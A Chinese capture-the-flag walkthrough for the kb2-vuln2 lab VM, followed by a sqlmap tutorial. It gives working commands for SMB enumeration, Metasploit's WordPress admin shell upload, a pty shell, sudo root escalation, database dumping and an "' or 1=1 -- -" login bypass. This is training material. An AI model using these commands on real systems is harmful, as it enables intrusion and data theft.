kb2-vuln2(smbmap工具的利用)

Posted 魏钦6666

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了kb2-vuln2(smbmap工具的利用)相关的知识,希望对你有一定的参考价值。

环境准备

靶机链接:百度网盘 请输入提取码

提取码:y4rx

虚拟机网络链接模式:桥接模式

攻击机系统:kali linux 2021.1

提示:如果导入靶机到virtualbox里显示“不能为虚拟电脑打开一个新任务“,打开虚拟机设置,选择USB 1.1控制器就解决了,应该是虚拟机版本和virtualbox版本不一致导致的错误。

信息收集:

用nmap对目标进行端口和服务的详细扫描

漏洞利用

1.由于探测到靶机有smb服务,用smbmap工具查看可利用信息

smbmap -H 192.168.1.104 -u guest //对信息进行枚举

smbclient '\\\\192.168.1.104\\Anoymous' -u guest //查看anonymous

get backup.zip 把文件下载下来

2.unzip backup.zip -d backup //解压到backup文件夹

3.进入backup目录查看文件 发现有一个文本文档

4.得到一个用户名密码 admin MachineBoy141

dirsearch -u 192.168.1.104/wordpress/

扫描到wp-login.php 进行访问 发现网站加载不完全 ,应该存在域名!

5.curl -i -L http://192.168.1.104/wordpress/wp-login.php //查看源码 显示 http response 的头信息,连同网页代码一起

6.发现网址前有一个域名 把域名加到 host里

7.用vi /etc/hosts 打开进行配置 source刷新下

8.再次登录就显示正常网页状态

9.启用msfconsole工具

use exploit/unix/webapp/wp_admin_shell_upload
show options
set rhost 192.168.1.104
set targeturi /wordpress
set username admin
set password MachineBoy141
set lport 445
run

权限提升

1.用python反弹交互式shell

python -c "import pty;pty.spawn('/bin/bash')"

2.sudo /bin/bash -p 提权成功!!!

sqlmap工具的利用

sqlmap工具的利用

 

 

利用sqlmap工具进行SQLI

找到某个可以发起数据库请求页面,并确定该页面可以SQLI后,可以先用burpsuite抓 个request包

然后把包里的内容保存到文本里,例如SQLI.txt

 

sudo sqlmap -r SQLI.txt --dbs  发送request,执行注入
sudo sqlmap -r SQLI.txt --current-db  查看当前所在的数据库名称
sudo sqlmap -r SQLI.txt -D \'current db\' --tables  查看当前数据中的table
sudo sqlmap -r SQLI.txt -D \'current db\' -T \'choose tab\' --columns  选择当前数据库中的table并查看column sudo sqlmap -r SQLI.txt -D \'current db\' -T \'choose tab\' -C \'choose col1,choose col2\' --dump  选择想要查看的column并显示出来

一番操作后便可以得到用户名及由md5加密的密码

将密码解密后便可以用其登录网站管理后台了

 

简单的SQL注入

在一些admin登录界面可以试试,like this:

 

 

 

输入:
Username:admin
Password:\' or 1=1 -- -

即可登录

以上是关于kb2-vuln2(smbmap工具的利用)的主要内容,如果未能解决你的问题,请参考以下文章

利用object.defineProperty实现数据与视图绑定

自己的微信小程序学习笔记——第三方UI库Lin-Ui的加载及使用

自己的微信小程序学习笔记——第三方UI库Lin-Ui的加载及使用

自己的微信小程序学习笔记——第三方UI库Lin-Ui的加载及使用

渗透测试工具懒人的福音,渗透测试单行化工具

vue项目自动构建工具1.0,支持多页面构建